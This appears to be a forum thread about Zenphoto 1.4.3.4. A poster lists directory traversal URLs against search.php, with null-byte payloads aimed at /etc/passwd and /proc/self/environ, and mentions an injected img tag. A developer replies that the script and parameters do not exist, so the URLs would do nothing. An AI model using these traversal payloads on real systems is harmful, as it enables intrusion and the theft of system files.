Directory traversal attack
Zenphoto version 1.4.3.4 [10988]
search.php?action=search&type=../../../../../../../../../../proc/self/environ&where%5B%5D=keywords&keyword=`redacted`
search.php?action=search&type=detail&where%5B%5D=/../../../../../../../../../../etc/passwd%00&keyword=`redacted`
search.php?action=search&type=detail&where%5B%5D=keywords&keyword=/../../../../../../../../../../proc/self/environ%00
search.php?action=search&type=detail&where%5B%5D=keywords&keyword=/../../../../../../../../../../etc/passwd%00
index.php has been manipulated by adding - EXAMPLE:
<img height="1" width="1" border="0" src="
http://IP address/NUMBER.jpg">
moderator's note: this message is probably spam, so I have redacted the keyword
Comments
The only `search.php` script files of Zenphoto are all in their variouos theme folders, so will not be run with the above URIs. You will get a 404 error as did acrylian.
If they actually were run independently of the theme load process they would all abort immediately.
If they did not abort immediately they still do no processing of URI query parameters, so the above parameters would do nothing.
If somehow you did get to the search engine from those links, the parameters still would be meaningless. We have nowhere an "action" of "search". Search does not make any use of a parameter named "type" nor does it make use of any parameter "keyword" or "keywords".
So perhaps you can elaborate on just what you are trying to say here.